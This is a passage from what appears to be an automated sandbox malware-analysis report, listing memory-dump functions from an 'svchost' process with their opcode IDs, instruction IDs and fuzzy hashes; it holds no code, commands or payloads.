                                                        • Opcode Fuzzy Hash: 9157e1ba54fb881516faecc9773ace2cc310913977769d1d8c6eea173ae553e1
                                                        • Instruction Fuzzy Hash: 13512721A0FA861FE396B77C985A2B57BE1DF86760B0900FBD08CC7197DD185C468366
                                                        Function 00007FF848D71295 Relevance: .9, Instructions: 862COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daeb6c02dac63c64c4f3f4ba9cdf882d58248e1f342c25867e76659549263898
                                                        • Instruction ID: 677cdf9aec6ffc01ac0ce2f1b02170518b60c5b392687553d46e6d2c2b6906d4
                                                        • Opcode Fuzzy Hash: daeb6c02dac63c64c4f3f4ba9cdf882d58248e1f342c25867e76659549263898
                                                        • Instruction Fuzzy Hash: 5121B633D0E6965FE741F77CA8A62E93BA1FF45360F0801F7D088DB193EA1858098368
                                                        Function 00007FF848D70985 Relevance: .3, Instructions: 346COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b5f34f19f826795b404af85408aa1e503df2ece459ebca5b91349e831a60fe1
                                                        • Instruction ID: 3882efe56e140e84c44bfad71373d23cfacce90fbf84e5662a5c079d11a7af5d
                                                        • Opcode Fuzzy Hash: 1b5f34f19f826795b404af85408aa1e503df2ece459ebca5b91349e831a60fe1
                                                        • Instruction Fuzzy Hash: 25A1263AA0E5269EE300BBBDB8556ED3B65FF85371F044577D148CB087CA24648A87F4
                                                        Function 00007FF848D709D3 Relevance: .3, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f05bf34a19679ec616fe740a2676930dd6fbe30e3836080ca3c110e7251f99a
                                                        • Instruction ID: b209d28509e94bbfb7c7936edd866ea0efd3ce1bc65c0f4737f90fd688d0c872
                                                        • Opcode Fuzzy Hash: 0f05bf34a19679ec616fe740a2676930dd6fbe30e3836080ca3c110e7251f99a
                                                        • Instruction Fuzzy Hash: 0A91273AA0A516AEE300BBBDB4556FD3BA5FF84371F444577D148CB1C7CA24248A87B8
                                                        Function 00007FF848D70A08 Relevance: .3, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 791b884c305360af5d9713468cf52c912256c213896befd614f37c08ca939082
                                                        • Instruction ID: dcf330e21db68ac238090ca777c3514e529d6697797631e01fb83e162b8ce366
                                                        • Opcode Fuzzy Hash: 791b884c305360af5d9713468cf52c912256c213896befd614f37c08ca939082
                                                        • Instruction Fuzzy Hash: AD812736A0A516AEE300BBBDB8556FD3BA5FF84371F044577D048CB1C7CA24248A87B8
                                                        Function 00007FF848D70A10 Relevance: .3, Instructions: 301COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 404ec0e61e6e21c0113e70168e17cd6767afa18741ef0bf35dc2615741761fed
                                                        • Instruction ID: 1b121e7ce87e4351d4e6f44285a6e5f3ad366745fd3999b3500d1f5a6520638c
                                                        • Opcode Fuzzy Hash: 404ec0e61e6e21c0113e70168e17cd6767afa18741ef0bf35dc2615741761fed
                                                        • Instruction Fuzzy Hash: C9812736A0A516AEE700BBBDB4556FD3BA5FF84371F044577D048C71C7CA24248A87B8
                                                        Function 00007FF848D70A48 Relevance: .3, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5811841476fac6e3cb8703d4ba7fcc3d8b6f28b42e003da1f66fb82fb23a9f9
                                                        • Instruction ID: dbddd68fc20de3a9560aa2d4378b1aa933dd7a9df2486025cf3602700b194b1c
                                                        • Opcode Fuzzy Hash: d5811841476fac6e3cb8703d4ba7fcc3d8b6f28b42e003da1f66fb82fb23a9f9
                                                        • Instruction Fuzzy Hash: 0871263AA0A516AEE300BBBDB8556FD3BA5FF84361F444577D048C71C7CA24648AC7B8
                                                        Function 00007FF848D70D21 Relevance: .1, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10a86467b285476195a74c47ca33c16a2993dbfa414042dfca62cf29629f360e
                                                        • Instruction ID: 899dc8726c6b61f76abb95439dd2df72fe6866f5b4dbb52080f28fc7cb06cf8b
                                                        • Opcode Fuzzy Hash: 10a86467b285476195a74c47ca33c16a2993dbfa414042dfca62cf29629f360e
                                                        • Instruction Fuzzy Hash: DF31C121E1E9499FE744B7AC581A3BD76E2FF98751F04027AE00DC36C6DE286C458791
                                                        Function 00007FF848D70BD3 Relevance: .1, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a055be4a0533bd9cd04f4a2b711c25a4740d5276503906aeeab79cc6e9260cd
                                                        • Instruction ID: bc16412e20f4934e6f9b86f585bf5126e034e12638f4bc94277c04750e2b63e8
                                                        • Opcode Fuzzy Hash: 1a055be4a0533bd9cd04f4a2b711c25a4740d5276503906aeeab79cc6e9260cd
                                                        • Instruction Fuzzy Hash: AF419E30A1E6498FEB44FBA898657BD7BA2FF88341F940479D009D32CADE3868458755
                                                        Function 00007FF848D70858 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 321f9ea7280da833f0aa3c307ac73ca8b630bec2e778f501a23569baff36b212
                                                        • Instruction ID: 344fcfa3882dba5f51c8c361929a927258cd0aa930255bb212ccf5e0868baea0
                                                        • Opcode Fuzzy Hash: 321f9ea7280da833f0aa3c307ac73ca8b630bec2e778f501a23569baff36b212
                                                        • Instruction Fuzzy Hash: 1131B42155A6495FD344FB6890B82BA3FB2FF95240FD444AAD008C73CFCF346885976A
                                                        Function 00007FF848D70870 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8fd776f8d44885636a777f0e11725cfe2fbe517b3c9e6f4ae2ef8d97b7b96a66
                                                        • Instruction ID: 031daae78f3a2c9ed19b2d5ab314c0859c0bedd5a6a30dc3e8d5fe9c15ca599f
                                                        • Opcode Fuzzy Hash: 8fd776f8d44885636a777f0e11725cfe2fbe517b3c9e6f4ae2ef8d97b7b96a66
                                                        • Instruction Fuzzy Hash: 0721C32056A6495FD354FB6880B82BE7F72FF95240FD444A9D008C33CECF346884976A